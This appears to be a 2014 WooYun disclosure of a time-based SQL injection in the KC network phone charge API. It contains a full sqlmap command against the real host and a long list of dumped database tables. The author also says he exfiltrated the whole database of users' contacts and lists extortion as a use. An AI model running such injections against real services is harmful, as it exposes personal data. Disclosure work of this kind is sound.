漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-087943
漏洞标题:KC网络电话某漏洞可脱裤
相关厂商:keepc.cm
漏洞作者: Arthur
提交时间:2014-12-20 17:00
修复时间:2014-12-25 17:02
公开时间:2014-12-25 17:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-20: 细节已通知厂商并且等待厂商处理中
2014-12-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
400多张表,脱了我两天才脱完。
详细说明:
sqlmap.py -u "http://mobilephone.keepc.com:2009/charge?src=35&kcid=116353269&paytype=31&goodstype=2&money=30
&cardno=012345678901234&cardpwd=0123456789012345678&pv=iphone&v=4.0.1&sign=7be18
01dc91c8f9c1931ae26a759ebdc&buynum=&brandid=kc&moneygroup=90030" --dbs -v 2 --delay 5
目前有效参数为money,goodstype,v,pv。
注入类型:延时注入 sleep(5)
影响人数较大,凡是使用该网络电话的人,通讯录都会被自动备份到服务器里面去。主要原因是APP里面的自动备份通讯录是默认开启的。(小编,审核完后记得电话号码打马赛克,谢谢了!)
安卓和IOS下载量在20万是不用说的了,假设每个人被自动备份了50个联系人,那么总共可以查到100万人的联系方式,名字,双方的关系等等。
利用范围:
1.敲诈勒索
2.广告推广
3.等等
漏洞证明:
available databases [3]:
[*] information_schema
[*] mobile
[*] test
Database: mobile
[464 tables]
+---------------------+
| T_ |
| `\11` |
| action_log |
| action_log_20130910 |
| action_log_20141029 |
| action_log_20141030 |
| action_log_20141031 |
| action_log_20141119 |
| action_log_20141120 |
| action_log_20141122 |
| action_log_20141123 |
| action_log_20141124 |
| action_log_20141125 |
| action_log_20141126 |
| action_log_20141127 |
| action_log_20141128 |
| action_log_20141129 |
| action_log_20141130 |
| action_log_20141201 |
| action_log_20141202 |
| action_log_20141203 |
| action_log_20141204 |
| action_log_20141205 |
| action_log_20141206 |
| action_log_20141207 |
| action_log_20141208 |
| action_log_20141209 |
| action_log_20141210 |
| action_log_20141211 |
| action_log_20141212 |
| action_log_20141213 |
| action_log_20141214 |
| action_log_20141215 |
| action_log_20141216 |
| action_log_20141217 |
| action_log_20141218 |
| action_log_20141219 |
| auto_log |
| auto_log_2013_10 |
| auto_log_2013_11 |
| auto_log_2013_12 |
| auto_log_2013_13 |
| auto_log_2013_14 |
| auto_log_2013_15 |
| auto_log_2013_16 |
| auto_log_2013_17 |
| auto_log_2013_18 |
| auto_log_2013_19 |
| auto_log_2013_20 |
| auto_log_2013_21 |
| auto_log_2013_22 |
| auto_log_2013_23 |
| auto_log_2013_24 |
| auto_log_2013_25 |
| auto_log_2013_26 |
| auto_log_2013_27 |
| auto_log_2013_27 |
| auto_log_2013_29 |
| auto_log_2013_30 |
| auto_log_2013_31 |
| auto_log_2013_32 |
| auto_log_2013_33 |
| auto_log_2013_34 |
| auto_log_2013_34 |
| auto_log_2013_36 |
| auto_log_2013_37 |
| auto_log_2013_38 |
| auto_log_2013_39 |
| auto_log_2013_40 |
| auto_log_2013_41 |
| auto_log_2013_42 |
| auto_log_2013_43 |
| auto_log_2013_44 |
| auto_log_2013_45 |
| auto_log_2013_46 |
| auto_log_2013_47 |
| auto_log_2013_48 |
| auto_log_2013_49 |
| auto_log_2013_50 |
| auto_log_2013_51 |
| auto_log_2013_52 |
| auto_log_2014_00 |
| auto_log_2014_01 |
| auto_log_2014_02 |
| auto_log_2014_03 |
| auto_log_2014_04 |
| auto_log_2014_05 |
| auto_log_2014_06 |
| auto_log_2014_07 |
| auto_log_2014_08 |
| auto_log_2014_09 |
| auto_log_2014_10 |
| auto_log_2014_11 |
| auto_log_2014_12 |
| auto_log_2014_13 |
| auto_log_2014_14 |
| auto_log_2014_15 |
| auto_log_2014_15 |
| auto_log_2014_17 |
| auto_log_2014_18 |
| auto_log_2014_19 |
| auto_log_2014_20 |
| auto_log_2014_21 |
| auto_log_2014_22 |
| auto_log_2014_23 |
| auto_log_2014_24 |
| auto_log_2014_25 |
| auto_log_2014_26 |
| auto_log_2014_27 |
| auto_log_2014_28 |
| auto_log_2014_29 |
| auto_log_2014_30 |
| auto_log_2014_31 |
| auto_log_2014_32 |
| auto_log_2014_33 |
| auto_log_2014_34 |
| auto_log_2014_35 |
| auto_log_2014_36 |
| auto_log_2014_37 |
| auto_log_2014_38 |
| auto_log_2014_39 |
| auto_log_2014_40 |
| auto_log_2014_41 |
| auto_log_2014_42 |
| auto_log_2014_43 |
| auto_log_2014_44 |
| auto_log_2014_45 |
| auto_log_2014_46 |
| auto_log_2014_47 |
| auto_log_2014_48 |
| auto_log_2014_49 |
| auto_log_2014_50 |
| bind_log |
| bind_mo_log |
| call_log |
| charge_log |
| configinfo |
| dtn_award |
| function_info |
| jingpin_pv |
| joke_channel |
| joke_list |
| joke_pv |
| login_log |
| login_log_2013_10 |
| login_log_2013_11 |
| login_log_2013_12 |
| login_log_2013_13 |
| login_log_2013_14 |
| login_log_2013_15 |
| login_log_2013_16 |
| login_log_2013_17 |
| login_log_2013_18 |
| login_log_2013_19 |
| login_log_2013_20 |
| login_log_2013_21 |
| login_log_2013_22 |
| login_log_2013_23 |
| login_log_2013_24 |
| login_log_2013_25 |
| login_log_2013_26 |
| login_log_2013_27 |
| login_log_2013_28 |
| login_log_2013_29 |
| login_log_2013_30 |
| login_log_2013_31 |
| login_log_2013_32 |
| login_log_2013_33 |
| login_log_2013_34 |
| login_log_2013_35 |
| login_log_2013_36 |
| login_log_2013_37 |
| login_log_2013_38 |
| login_log_2013_39 |
| login_log_2013_40 |
| login_log_2013_41 |
| login_log_2013_42 |
| login_log_2013_43 |
| login_log_2013_44 |
| login_log_2013_45 |
| login_log_2013_46 |
| login_log_2013_47 |
| login_log_2013_48 |
| login_log_2013_49 |
| login_log_2013_50 |
| login_log_2013_51 |
| login_log_2013_52 |
| login_log_2014_00 |
| login_log_2014_01 |
| login_log_2014_02 |
| login_log_2014_03 |
| login_log_2014_04 |
| login_log_2014_05 |
| login_log_2014_06 |
| login_log_2014_07 |
| login_log_2014_07 |
| login_log_2014_08 |
| login_log_2014_09 |
| login_log_2014_10 |
| login_log_2014_11 |
| login_log_2014_12 |
| login_log_2014_13 |
| login_log_2014_14 |
| login_log_2014_15 |
| login_log_2014_16 |
| login_log_2014_17 |
| login_log_2014_18 |
| login_log_2014_19 |
| login_log_2014_20 |
| login_log_2014_21 |
| login_log_2014_22 |
| login_log_2014_23 |
| login_log_2014_24 |
| login_log_2014_25 |
| login_log_2014_26 |
| login_log_2014_27 |
| login_log_2014_28 |
| login_log_2014_29 |
| login_log_2014_30 |
| login_log_2014_31 |
| login_log_2014_32 |
| login_log_2014_33 |
| login_log_2014_34 |
| login_log_2014_35 |
| login_log_2014_36 |
| login_log_2014_37 |
| login_log_2014_38 |
| login_log_2014_39 |
| login_log_2014_40 |
| login_log_2014_41 |
| login_log_2014_42 |
| login_log_2014_43 |
| login_log_2014_44 |
| login_log_2014_45 |
| login_log_2014_46 |
| login_log_2014_47 |
| login_log_2014_48 |
| login_log_2014_49 |
| login_log_2014_50 |
| msg_pv |
| reg_log |
| reg_log_2013_10 |
| reg_log_2013_11 |
| reg_log_2013_12 |
| reg_log_2013_13 |
| reg_log_2013_14 |
| reg_log_2013_15 |
| reg_log_2013_16 |
| reg_log_2013_17 |
| reg_log_2013_18 |
| reg_log_2013_19 |
| reg_log_2013_20 |
| reg_log_2013_21 |
| reg_log_2013_22 |
| reg_log_2013_23 |
| reg_log_2013_24 |
| reg_log_2013_25 |
| reg_log_2013_26 |
| reg_log_2013_27 |
| reg_log_2013_28 |
| reg_log_2013_29 |
| reg_log_2013_30 |
| reg_log_2013_31 |
| reg_log_2013_32 |
| reg_log_2013_33 |
| reg_log_2013_34 |
| reg_log_2013_35 |
| reg_log_2013_36 |
| reg_log_2013_37 |
| reg_log_2013_38 |
| reg_log_2013_39 |
| reg_log_2013_40 |
| reg_log_2013_41 |
| reg_log_2013_42 |
| reg_log_2013_43 |
| reg_log_2013_44 |
| reg_log_2013_45 |
| reg_log_2013_46 |
| reg_log_2013_47 |
| reg_log_2013_48 |
| reg_log_2013_49 |
| reg_log_2013_50 |
| reg_log_2013_50 |
| reg_log_2013_52 |
| reg_log_2014_00 |
| reg_log_2014_01 |
| reg_log_2014_02 |
| reg_log_2014_03 |
| reg_log_2014_05 |
| reg_log_2014_06 |
| reg_log_2014_07 |
| reg_log_2014_08 |
| reg_log_2014_09 |
| reg_log_2014_10 |
| reg_log_2014_11 |
| reg_log_2014_12 |
| reg_log_2014_13 |
| reg_log_2014_14 |
| reg_log_2014_15 |
| reg_log_2014_16 |
| reg_log_2014_17 |
| reg_log_2014_18 |
| reg_log_2014_19 |
| reg_log_2014_20 |
| reg_log_2014_21 |
| reg_log_2014_22 |
| reg_log_2014_23 |
| reg_log_2014_24 |
| reg_log_2014_25 |
| reg_log_2014_26 |
| reg_log_2014_27 |
| reg_log_2014_28 |
| reg_log_2014_29 |
| reg_log_2014_30 |
| reg_log_2014_31 |
| reg_log_2014_32 |
| reg_log_2014_33 |
| reg_log_2014_34 |
| reg_log_2014_35 |
| reg_log_2014_36 |
| reg_log_2014_37 |
| reg_log_2014_38 |
| reg_log_2014_39 |
| reg_log_2014_40 |
| reg_log_2014_41 |
| reg_log_2014_42 |
| reg_log_2014_43 |
| reg_log_2014_44 |
| reg_log_2014_45 |
| reg_log_2014_46 |
| reg_log_2014_47 |
| reg_log_2014_48 |
| reg_log_2014_49 |
| reg_log_2014_50 |
| reg_test |
| service_info |
| sign_count |
| sign_log |
| sign_log_2013_10 |
| sign_log_2013_11 |
| sign_log_2013_12 |
| sign_log_2013_13 |
| sign_log_2013_14 |
| sign_log_2013_15 |
| sign_log_2013_16 |
| sign_log_2013_16 |
| sign_log_2013_18 |
| sign_log_2013_19 |
| sign_log_2013_20 |
| sign_log_2013_21 |
| sign_log_2013_22 |
| sign_log_2013_23 |
| sign_log_2013_24 |
| sign_log_2013_25 |
| sign_log_2013_26 |
| sign_log_2013_27 |
| sign_log_2013_27 |
| sign_log_2013_29 |
| sign_log_2013_30 |
| soft_jingpin |
| soft_level1 |
| soft_level2 |
| soft_pv |
| sysmsg |
| sysmsg_log |
| sysmsg_log_2013_10 |
| sysmsg_log_2013_11 |
| sysmsg_log_2013_12 |
| sysmsg_log_2013_13 |
| sysmsg_log_2013_14 |
| sysmsg_log_2013_15 |
| sysmsg_log_2013_16 |
| sysmsg_log_2013_17 |
| sysmsg_log_2013_18 |
| sysmsg_log_2013_19 |
| sysmsg_log_2013_20 |
| sysmsg_log_2013_21 |
| sysmsg_log_2013_22 |
| sysmsg_log_2013_23 |
| sysmsg_log_2013_24 |
| sysmsg_log_2013_25 |
| sysmsg_log_2013_26 |
| sysmsg_log_2013_27 |
| sysmsg_log_2013_28 |
| sysmsg_log_2013_29 |
| sysmsg_log_2013_30 |
| sysmsg_log_2013_31 |
| sysmsg_log_2013_32 |
| sysmsg_log_2013_33 |
| sysmsg_log_2013_34 |
| sysmsg_log_2013_35 |
| sysmsg_log_2013_36 |
| sysmsg_log_2013_37 |
| sysmsg_log_2013_38 |
| sysmsg_log_2013_39 |
| sysmsg_log_2013_40 |
| sysmsg_log_2013_41 |
| sysmsg_log_2013_42 |
| sysmsg_log_2013_43 |
| sysmsg_log_2013_44 |
| sysmsg_log_2013_44 |
| sysmsg_log_2013_46 |
| sysmsg_log_2013_47 |
| sysmsg_log_2013_48 |
| sysmsg_log_2013_49 |
| sysmsg_log_2013_50 |
| sysmsg_log_2013_51 |
| sysmsg_log_2013_52 |
| sysmsg_log_2014_00 |
| sysmsg_log_2014_01 |
| sysmsg_log_2014_02 |
| sysmsg_log_2014_03 |
| sysmsg_log_2014_04 |
| sysmsg_log_2014_05 |
| sysmsg_log_2014_06 |
| sysmsg_log_2014_07 |
| sysmsg_log_2014_08 |
| sysmsg_log_2014_09 |
| sysmsg_log_2014_10 |
| sysmsg_log_2014_11 |
| sysmsg_log_2014_12 |
| sysmsg_log_2014_13 |
| sysmsg_log_2014_14 |
| sysmsg_log_2014_15 |
| sysmsg_log_2014_16 |
| sysmsg_log_2014_17 |
| sysmsg_log_2014_18 |
| sysmsg_log_2014_19 |
| sysmsg_log_2014_20 |
| sysmsg_log_2014_21 |
| sysmsg_log_2014_22 |
| sysmsg_log_2014_22 |
| sysmsg_log_2014_23 |
| sysmsg_log_2014_24 |
| sysmsg_log_2014_25 |
| sysmsg_log_2014_26 |
| sysmsg_log_2014_27 |
| sysmsg_log_2014_28 |
| sysmsg_log_2014_29 |
| sysmsg_log_2014_30 |
| sysmsg_log_2014_31 |
| sysmsg_log_2014_32 |
| sysmsg_log_2014_33 |
| sysmsg_log_2014_34 |
| sysmsg_log_2014_35 |
| sysmsg_log_2014_36 |
| sysmsg_log_2014_37 |
| sysmsg_log_2014_38 |
| sysmsg_log_2014_39 |
| sysmsg_log_2014_40 |
| sysmsg_log_2014_41 |
| sysmsg_log_2014_42 |
| sysmsg_log_2014_43 |
| sysmsg_log_2014_44 |
| sysmsg_log_2014_45 |
| sysmsg_log_2014_46 |
| sysmsg_log_2014_47 |
| sysmsg_log_2014_48 |
| sysmsg_log_2014_49 |
| sysmsg_log_2014_50 |
| temp_reg_process |
| update_version |
| user |
| user_token |
+---------------------+
修复方案:
防火墙
PS:最近申请大学,求感谢信和礼物。
版权声明:转载请注明来源 Arthur@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-12-25 17:02
厂商回复:
最新状态:
2015-01-21:目前已经修复,由于开发在语句要求不严谨导致了问题,非常感谢协助暴露出类似问题。